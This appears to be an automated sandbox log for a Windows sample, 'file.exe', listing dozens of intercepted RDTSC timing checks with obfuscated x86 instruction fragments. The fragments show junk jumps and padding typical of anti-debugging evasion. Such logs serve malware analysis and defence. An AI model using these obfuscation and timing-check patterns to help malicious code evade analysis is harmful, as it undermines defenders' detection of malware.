Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49E0E63 second address: 49E0E69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49E0E69 second address: 49E0ECA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ecx 0x00000005 pushfd 0x00000006 jmp 00007F8A2D3CFEE1h 0x0000000b xor ax, 1106h 0x00000010 jmp 00007F8A2D3CFEE1h 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 xchg eax, ebp 0x0000001a jmp 00007F8A2D3CFEDEh 0x0000001f mov ebp, esp 0x00000021 jmp 00007F8A2D3CFEE0h 0x00000026 pop ebp 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b jmp 00007F8A2D3CFEDAh 0x00000030 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49E0ECA second address: 49E0ED9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8A2CE89C9Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A2001B second address: 4A20066 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F8A2D3CFEDFh 0x00000008 mov ax, E2BFh 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f xchg eax, ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 mov dl, FFh 0x00000015 pushfd 0x00000016 jmp 00007F8A2D3CFEE8h 0x0000001b xor eax, 3A6270D8h 0x00000021 jmp 00007F8A2D3CFEDBh 0x00000026 popfd 0x00000027 popad 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A20066 second address: 4A20078 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bl, 07h 0x00000005 mov ch, CDh 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e mov ax, bx 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49B0103 second address: 49B0107 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49B0107 second address: 49B010D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49B010D second address: 49B015F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8A2D3CFEDFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b mov al, 63h 0x0000000d push edi 0x0000000e call 00007F8A2D3CFEDCh 0x00000013 pop ecx 0x00000014 pop edx 0x00000015 popad 0x00000016 mov ebp, esp 0x00000018 pushad 0x00000019 call 00007F8A2D3CFEDCh 0x0000001e mov ch, E6h 0x00000020 pop ebx 0x00000021 call 00007F8A2D3CFEDCh 0x00000026 mov edx, eax 0x00000028 pop esi 0x00000029 popad 0x0000002a push dword ptr [ebp+04h] 0x0000002d push eax 0x0000002e push edx 0x0000002f push eax 0x00000030 push edx 0x00000031 push eax 0x00000032 push edx 0x00000033 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49B015F second address: 49B0163 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49B0163 second address: 49B0179 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8A2D3CFEE2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49B0179 second address: 49B019E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, 3AE90F84h 0x00000008 mov ecx, edx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push dword ptr [ebp+0Ch] 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F8A2CE89CA1h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49B019E second address: 49B01A4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49B01A4 second address: 49B01D1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F8A2CE89CA6h 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push dword ptr [ebp+08h] 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F8A2CE89C9Ah 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49B01D1 second address: 49B01D7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49B0208 second address: 49B0233 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, 3976BACAh 0x00000008 jmp 00007F8A2CE89C9Bh 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pop ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F8A2CE89CA0h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49B0233 second address: 49B0239 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49B0239 second address: 49B023E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49D0AE6 second address: 49D0AEC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49D0AEC second address: 49D0AF2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49D0AF2 second address: 49D0AF6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49D06B2 second address: 49D06B8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49D06B8 second address: 49D06F4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8A2D3CFEDCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F8A2D3CFEE0h 0x0000000f mov ebp, esp 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F8A2D3CFEE7h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49D06F4 second address: 49D071F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, di 0x00000006 jmp 00007F8A2CE89C9Bh 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pop ebp 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 call 00007F8A2CE89CA2h 0x00000017 pop eax 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49D03C3 second address: 49D0434 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F8A2D3CFEDFh 0x00000008 movzx ecx, dx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f pushad 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 pop edx 0x00000015 popad 0x00000016 push ecx 0x00000017 pop eax 0x00000018 popad 0x00000019 xchg eax, ebp 0x0000001a jmp 00007F8A2D3CFEE1h 0x0000001f mov ebp, esp 0x00000021 pushad 0x00000022 mov ax, F323h 0x00000026 call 00007F8A2D3CFEE8h 0x0000002b jmp 00007F8A2D3CFEE2h 0x00000030 pop ecx 0x00000031 popad 0x00000032 pop ebp 0x00000033 push eax 0x00000034 push edx 0x00000035 pushad 0x00000036 pushad 0x00000037 popad 0x00000038 mov ebx, eax 0x0000003a popad 0x0000003b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49E002C second address: 49E007D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8A2CE89CA4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b mov bx, ax 0x0000000e movzx ecx, dx 0x00000011 popad 0x00000012 mov ebp, esp 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 mov al, 31h 0x00000019 pushfd 0x0000001a jmp 00007F8A2CE89CA3h 0x0000001f jmp 00007F8A2CE89CA3h 0x00000024 popfd 0x00000025 popad 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A10EEF second address: 4A10F2E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, 6D02ACFAh 0x00000008 mov cl, bh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xchg eax, ebp 0x0000000e pushad 0x0000000f movzx ecx, dx 0x00000012 mov cx, di 0x00000015 popad 0x00000016 push eax 0x00000017 jmp 00007F8A2D3CFEDEh 0x0000001c xchg eax, ebp 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007F8A2D3CFEE7h 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A10F2E second address: 4A10F71 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F8A2CE89C9Fh 0x00000009 and esi, 15A33B5Eh 0x0000000f jmp 00007F8A2CE89CA9h 0x00000014 popfd 0x00000015 mov eax, 02B95827h 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d mov ebp, esp 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 popad 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A10F71 second address: 4A10F75 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A10F75 second address: 4A10F7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A10F7B second address: 4A10F81 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A10F81 second address: 4A10F85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49F02E3 second address: 49F02FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop ebx 0x00000006 popad 0x00000007 popad 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F8A2D3CFEDDh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49F02FB second address: 49F030B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8A2CE89C9Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49F030B second address: 49F030F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49F030F second address: 49F032E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F8A2CE89C9Eh 0x0000000e xchg eax, ebp 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49F032E second address: 49F0333 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49F0333 second address: 49F0339 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49F0339 second address: 49F0359 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8A2D3CFEE0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 mov eax, 37513263h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49F0359 second address: 49F037B instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov ecx, 35F08ADBh 0x0000000b popad 0x0000000c mov eax, dword ptr [ebp+08h] 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 jmp 00007F8A2CE89C9Fh 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49F037B second address: 49F03EA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F8A2D3CFEDFh 0x00000009 and ax, 75EEh 0x0000000e jmp 00007F8A2D3CFEE9h 0x00000013 popfd 0x00000014 pushfd 0x00000015 jmp 00007F8A2D3CFEE0h 0x0000001a sub ah, 00000068h 0x0000001d jmp 00007F8A2D3CFEDBh 0x00000022 popfd 0x00000023 popad 0x00000024 pop edx 0x00000025 pop eax 0x00000026 and dword ptr [eax], 00000000h 0x00000029 push eax 0x0000002a push edx 0x0000002b jmp 00007F8A2D3CFEE5h 0x00000030 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49F012D second address: 49F01AD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8A2CE89CA1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F8A2CE89C9Eh 0x0000000f push eax 0x00000010 jmp 00007F8A2CE89C9Bh 0x00000015 xchg eax, ebp 0x00000016 jmp 00007F8A2CE89CA6h 0x0000001b mov ebp, esp 0x0000001d pushad 0x0000001e pushfd 0x0000001f jmp 00007F8A2CE89C9Eh 0x00000024 jmp 00007F8A2CE89CA5h 0x00000029 popfd 0x0000002a push eax 0x0000002b push edx 0x0000002c call 00007F8A2CE89C9Eh 0x00000031 pop eax 0x00000032 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A1073A second address: 4A10760 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8A2D3CFEE1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ecx 0x0000000a pushad 0x0000000b movzx ecx, di 0x0000000e push edx 0x0000000f mov al, 29h 0x00000011 pop edi 0x00000012 popad 0x00000013 push eax 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A10760 second address: 4A10778 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8A2CE89CA4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A10778 second address: 4A1077E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A1077E second address: 4A10782 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A10782 second address: 4A107A1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F8A2D3CFEE4h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A107A1 second address: 4A107A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A107A7 second address: 4A107AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A107AB second address: 4A107AF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A107AF second address: 4A107D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [775165FCh] 0x0000000d pushad 0x0000000e movsx edx, si 0x00000011 popad 0x00000012 test eax, eax 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F8A2D3CFEDFh 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A107D6 second address: 4A107F3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8A2CE89CA9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A107F3 second address: 4A10812 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8A2D3CFEE1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007F8A9FE53034h 0x0000000f pushad 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A10812 second address: 4A10858 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8A2CE89CA8h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushfd 0x0000000d jmp 00007F8A2CE89CA0h 0x00000012 jmp 00007F8A2CE89CA5h 0x00000017 popfd 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A10858 second address: 4A10890 instructions: 0x00000000 rdtsc 0x00000002 call 00007F8A2D3CFEE0h 0x00000007 pop ecx 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov ecx, eax 0x0000000d jmp 00007F8A2D3CFEE1h 0x00000012 xor eax, dword ptr [ebp+08h] 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F8A2D3CFEDAh 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A10890 second address: 4A1095C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F8A2CE89CA1h 0x00000009 add eax, 679C68F6h 0x0000000f jmp 00007F8A2CE89CA1h 0x00000014 popfd 0x00000015 mov bh, al 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a and ecx, 1Fh 0x0000001d pushad 0x0000001e pushfd 0x0000001f jmp 00007F8A2CE89CA9h 0x00000024 and ah, 00000006h 0x00000027 jmp 00007F8A2CE89CA1h 0x0000002c popfd 0x0000002d mov ax, D0B7h 0x00000031 popad 0x00000032 ror eax, cl 0x00000034 pushad 0x00000035 mov eax, 54291FAFh 0x0000003a pushfd 0x0000003b jmp 00007F8A2CE89CA4h 0x00000040 xor ch, FFFFFFD8h 0x00000043 jmp 00007F8A2CE89C9Bh 0x00000048 popfd 0x00000049 popad 0x0000004a leave 0x0000004b jmp 00007F8A2CE89CA6h 0x00000050 retn 0004h 0x00000053 nop 0x00000054 mov esi, eax 0x00000056 lea eax, dword ptr [ebp-08h] 0x00000059 xor esi, dword ptr [00692014h] 0x0000005f push eax 0x00000060 push eax 0x00000061 push eax 0x00000062 lea eax, dword ptr [ebp-10h] 0x00000065 push eax 0x00000066 call 00007F8A3124A517h 0x0000006b push FFFFFFFEh 0x0000006d push eax 0x0000006e push edx 0x0000006f jmp 00007F8A2CE89CA7h 0x00000074 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A1095C second address: 4A10962 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A10962 second address: 4A10966 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A10966 second address: 4A10993 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop eax 0x00000009 pushad 0x0000000a movsx ebx, si 0x0000000d mov eax, 1B0CB9E5h 0x00000012 popad 0x00000013 ret 0x00000014 nop 0x00000015 push eax 0x00000016 call 00007F8A31790789h 0x0000001b mov edi, edi 0x0000001d jmp 00007F8A2D3CFEE0h 0x00000022 xchg eax, ebp 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 popad 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A10993 second address: 4A10999 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49C0008 second address: 49C005A instructions: 0x00000000 rdtsc 0x00000002 mov di, F9BCh 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 mov esi, ebx 0x0000000b mov ecx, ebx 0x0000000d popad 0x0000000e popad 0x0000000f push eax 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007F8A2D3CFEE4h 0x00000017 and eax, 54386808h 0x0000001d jmp 00007F8A2D3CFEDBh 0x00000022 popfd 0x00000023 mov bx, cx 0x00000026 popad 0x00000027 mov dword ptr [esp], ebp 0x0000002a push eax 0x0000002b push edx 0x0000002c jmp 00007F8A2D3CFEE1h 0x00000031 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49C005A second address: 49C00CB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8A2CE89CA1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c mov ecx, 50627EF3h 0x00000011 pushfd 0x00000012 jmp 00007F8A2CE89CA8h 0x00000017 sub esi, 4F4187F8h 0x0000001d jmp 00007F8A2CE89C9Bh 0x00000022 popfd 0x00000023 popad 0x00000024 and esp, FFFFFFF8h 0x00000027 pushad 0x00000028 push eax 0x00000029 push edx 0x0000002a pushfd 0x0000002b jmp 00007F8A2CE89CA2h 0x00000030 xor al, 00000058h 0x00000033 jmp 00007F8A2CE89C9Bh 0x00000038 popfd 0x00000039 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49C00CB second address: 49C0134 instructions: 0x00000000 rdtsc 0x00000002 movzx eax, dx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushfd 0x00000008 jmp 00007F8A2D3CFEE5h 0x0000000d xor eax, 7646DDF6h 0x00000013 jmp 00007F8A2D3CFEE1h 0x00000018 popfd 0x00000019 popad 0x0000001a xchg eax, ecx 0x0000001b jmp 00007F8A2D3CFEDEh 0x00000020 push eax 0x00000021 jmp 00007F8A2D3CFEDBh 0x00000026 xchg eax, ecx 0x00000027 push eax 0x00000028 push edx 0x00000029 jmp 00007F8A2D3CFEE5h 0x0000002e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49C0134 second address: 49C01AB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8A2CE89CA1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a pushad 0x0000000b push ecx 0x0000000c push edx 0x0000000d pop esi 0x0000000e pop edi 0x0000000f pushfd 0x00000010 jmp 00007F8A2CE89CA4h 0x00000015 adc eax, 610CBB08h 0x0000001b jmp 00007F8A2CE89C9Bh 0x00000020 popfd 0x00000021 popad 0x00000022 push eax 0x00000023 jmp 00007F8A2CE89CA9h 0x00000028 xchg eax, ebx 0x00000029 pushad 0x0000002a movzx ecx, bx 0x0000002d popad 0x0000002e mov ebx, dword ptr [ebp+10h] 0x00000031 push eax 0x00000032 push edx 0x00000033 push eax 0x00000034 push edx 0x00000035 jmp 00007F8A2CE89C9Dh 0x0000003a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49C01AB second address: 49C01B1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49C01B1 second address: 49C0210 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8A2CE89C9Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a jmp 00007F8A2CE89CA0h 0x0000000f push eax 0x00000010 pushad 0x00000011 push edx 0x00000012 mov bx, si 0x00000015 pop ecx 0x00000016 pushfd 0x00000017 jmp 00007F8A2CE89CA9h 0x0000001c and al, 00000046h 0x0000001f jmp 00007F8A2CE89CA1h 0x00000024 popfd 0x00000025 popad 0x00000026 xchg eax, esi 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b pushad 0x0000002c popad 0x0000002d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49C0210 second address: 49C0216 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49C0216 second address: 49C02F3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8A2CE89CA2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov esi, dword ptr [ebp+08h] 0x0000000c pushad 0x0000000d mov ax, AEADh 0x00000011 pushad 0x00000012 mov si, CDCFh 0x00000016 pushfd 0x00000017 jmp 00007F8A2CE89CA4h 0x0000001c jmp 00007F8A2CE89CA5h 0x00000021 popfd 0x00000022 popad 0x00000023 popad 0x00000024 xchg eax, edi 0x00000025 jmp 00007F8A2CE89C9Eh 0x0000002a push eax 0x0000002b jmp 00007F8A2CE89C9Bh 0x00000030 xchg eax, edi 0x00000031 jmp 00007F8A2CE89CA6h 0x00000036 test esi, esi 0x00000038 jmp 00007F8A2CE89CA0h 0x0000003d je 00007F8A9F958001h 0x00000043 jmp 00007F8A2CE89CA0h 0x00000048 cmp dword ptr [esi+08h], DDEEDDEEh 0x0000004f push eax 0x00000050 push edx 0x00000051 pushad 0x00000052 push ebx 0x00000053 pop eax 0x00000054 pushfd 0x00000055 jmp 00007F8A2CE89CA9h 0x0000005a jmp 00007F8A2CE89C9Bh 0x0000005f popfd 0x00000060 popad 0x00000061 rdtsc
